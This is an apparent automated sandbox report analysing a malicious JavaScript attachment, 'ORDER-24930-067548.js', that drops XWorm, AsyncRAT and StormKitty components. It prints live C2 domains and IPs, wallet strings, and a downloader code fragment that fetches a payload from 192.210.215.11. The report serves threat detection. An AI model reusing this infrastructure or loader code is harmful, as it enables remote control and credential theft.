Windows Analysis Report
ORDER-24930-067548.js

Overview

General Information

Sample name: ORDER-24930-067548.js
Analysis ID: 1523152
MD5: 8fbf57ab035ec7063b9522e5f30a75f7
SHA1: cd761463221ba82f46b2b28fe56a0e74588c64b9
SHA256: ff84d777db298c70e206a94f1a4a1a5d5536d8cd42eedbd50ffde364daa368a6
Tags: AsyncRATjsRATuser-abuse_ch
Infos:

Detection

StormKitty, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected XWorm
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Contains functionality to disable the Task Manager (.Net Source)
Creates multiple autostart registry keys
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Machine Learning detection for dropped file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\OLWJMU.js Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js Avira: detection malicious, Label: JS/Dldr.G17
Source: C:\Users\user\AppData\Roaming\Service.exe Avira: detection malicious, Label: TR/Dropper.Gen
Found malware configuration
Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["as525795.duckdns.org", "194.37.97.150"], "Port": "6980", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "adobe.exe", "Version": "XWorm V5.3"}
Multi AV Scanner detection for submitted file
Source: ORDER-24930-067548.js Virustotal: Detection: 30% Perma Link
Source: ORDER-24930-067548.js ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Service.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: as525795.duckdns.org,194.37.97.150
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: 6980
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: <123456789>
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: <Xwormmm>
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: XWorm V5.3
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: adobe.exe
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: bc1q6ctx30m7yf3swhuskp3n34awjtnxw7974qewyh
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: 0x344Bc250C2901d36f2FD4698632D289B9977BEd6
Source: 13.2.Service.exe.2e085e0.4.raw.unpack String decryptor: BLMpkfcDYXR1q2bgbj2mBPk9uQsgAVc6vdv62zRuMAHN
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdbT3n3 `3_CorDllMainmscoree.dll source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000004.00000002.1508185282.00000000050F0000.00000004.08000000.00040000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000007.00000002.1632367681.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 0000000D.00000002.1706268974.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.00000000029E7000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002A36000.00000004.00000800.00020000.00000000.sdmp, GeUT.exe, 00000013.00000002.1791924258.0000000002B16000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002846000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002896000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002803000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.00000000027B6000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002767000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.000000000284D000.00000004.00000800.00020000.00000000.sdmp, Service.exe, 00000019.00000002.1882782086.0000000002769000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior

Software Vulnerabilities
barindex
JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: ORDER-24930-067548.js Argument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo'] Go to definition
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 4x nop then jmp 07CB4676h 5_2_07CB44E0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 4x nop then inc dword ptr [ebp-30h] 5_2_07CB6538
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 4x nop then inc dword ptr [ebp-30h] 5_2_07CB3BD0

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 194.37.97.150:6980 -> 192.168.2.8:49705
Source: Network traffic Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 194.37.97.150:6980 -> 192.168.2.8:49705
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49705 -> 194.37.97.150:6980
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49705 -> 194.37.97.150:6980
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 192.210.215.11 80 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: as525795.duckdns.org
Source: Malware configuration extractor URLs: 194.37.97.150
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
Source: ORDER-24930-067548.js Argument value : ['"try{\nvar Object = new ActiveXObject("MSXML2.XMLHTTP");\nObject.Open("GET", "http://192.210.215.11/zo'] Go to definition
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.8:49705 -> 194.37.97.150:6980
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 192.210.215.11 192.210.215.11
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT AT-AGES-ASAustrianAgencyforHealthandFoodSafetyAT
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zoom/cc.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: unknown TCP traffic detected without corresponding DNS query: 194.37.97.150
Source: global traffic HTTP traffic detected: GET /zoom/cc.js HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 192.210.215.11Connection: Keep-Alive
Source: wscript.exe, 00000000.00000003.1467024468.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1475994870.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1465964784.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466406423.000002BDE0E4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/cc.j
Source: wscript.exe, 00000000.00000003.1466341285.000002BDE0E4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466568496.000002BDDF071000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1463316845.000002BDE17D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/cc.js
Source: wscript.exe, 00000000.00000002.1473794151.000002BDDF0C6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1466505372.000002BDDF0C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://192.210.215.11/zoom/cc.jst
Source: GeUT.exe, 00000015.00000002.1819069957.0000000000925000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic
Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: places.raw.5.dr String found in binary or memory: https://support.mozilla.org
Source: places.raw.5.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: places.raw.5.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_see
Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: places.raw.5.dr String found in binary or memory: https://www.mozilla.org
Source: places.raw.5.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: places.raw.5.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: places.raw.5.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: tmp5F14.tmp.dat.5.dr, places.raw.5.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Creates a window with clipboard capturing capabilities
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4} Jump to behavior
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_0082617C NtUnmapViewOfSection, 25_2_0082617C
Source: C:\Users\user\AppData\Roaming\Service.exe Code function: 25_2_00828000 NtUnmapViewOfSection, 25_2_00828000
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Deletes files inside the Windows folder
Source: C:\Windows\System32\wbem\WMIADAP.exe File deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 4_2_02A90D33 4_2_02A90D33
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_01232796 5_2_01232796
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_0123F460 5_2_0123F460
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_012313B8 5_2_012313B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_05D86AF8 5_2_05D86AF8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_05D879CB 5_2_05D879CB
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CA4360 5_2_06CA4360
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CA4C30 5_2_06CA4C30
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CACD88 5_2_06CACD88
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CA88B8 5_2_06CA88B8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CA3C18 5_2_06CA3C18
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07A3B8F8 5_2_07A3B8F8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07A3E070 5_2_07A3E070
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07A3D770 5_2_07A3D770
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07A3BE88 5_2_07A3BE88
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB0778 5_2_07CB0778
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB564F 5_2_07CB564F
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB6AB8 5_2_07CB6AB8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB0768 5_2_07CB0768
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB6538 5_2_07CB6538
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB1C10 5_2_07CB1C10
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB3BD0 5_2_07CB3BD0
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB6AA8 5_2_07CB6AA8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CBF9A8 5_2_07CBF9A8
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CFEBBB 5_2_07CFEBBB
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF2B5B 5_2_07CF2B5B
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF9D39 5_2_07CF9D39
Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CF0448 5_2_07CF0448
